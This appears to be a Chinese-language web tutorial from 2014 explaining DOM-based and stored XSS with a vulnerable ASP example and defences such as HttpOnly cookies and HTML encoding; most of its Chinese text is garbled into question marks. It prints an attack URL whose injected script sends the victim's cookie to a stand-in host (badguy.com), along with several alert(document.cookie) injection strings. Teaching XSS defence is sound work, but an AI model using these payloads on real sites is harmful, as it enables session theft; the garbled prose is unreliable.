Web????????XSS
???????????? ???????[ 2014/3/10 15:48:50 ] ????????XSS Web???? ??? JavaScript
????XSS ????????
????1. Dom-Based XSS ??? ????????????
????Tom ??????Victim.com?е?????????XSS?????
????????: http://victim.com/search.asp?term=apple
????????????Search.asp ?????????????
<html>
<title></title>
<body>
Results for <%Reequest.QueryString("term")%>
...
</body>
</html>
????Tom ???????????http://badguy.com?? ????????“?”?????????
???????Tom ????????????url(????)?? ????????(?????QQ)????Monica
????http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>
????Monica????????URL?? ?????URL?е????Javascript???????Monica????????????. ???Monica??victim.com?????cookie?? ???????badguy????С?????Monica??victim.com ???????Tom????.
????2. Stored XSS(?洢?XSS???)?? ??????????ù??????п???????Web??????????????????????????????????????Web???????????????з????????????????????й??????? ????????????
????Alex?????????A???????XSS ?????????????????????????????????У?
????Alex???????????£???????????????JavaScript????
????????????Monica??????????μ??????????????е????Javascript???????Monica???????????У????cookie???????????????Alex?????
????Dom-Based XSS?????в??????壬???洢?XSS???????в???????????????.
????XSS ??????
??????????????????????????
???????: ?????????????<script></script>??
???????????cookie????http only?? ???????Javascript ?е?document.cookie?????????cookie??.
??????????????????????????????? ???磺???????textbox?У?????????????????? ?????????????????????
?????????????Html Encode ????
?????????????????Html????? ????: <script>?? <iframe> ?? < for <?? > for >?? " for
????????JavaScript ????????????? "onclick="?? "onfocus" ????
??????β???XSS???
??????????? ??????????????????? ??????????????Web ????????????????? Querystring?? Form????????cookie. ??????ASP??????У????Request???????????????
<%
strUserCode = Request.QueryString(“code”);
strUser = Request.Form(“USER”);
strID = Request.Cookies(“ID”);
%>
?????????????о???htmlEncode????? ?????????????????XSS???
?????????????????????????
"/><script>alert(document.cookie)</script><!--
<script>alert(document.cookie)</script><!--
"onclick="alert(document.cookie)
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11
sales@spasvo.com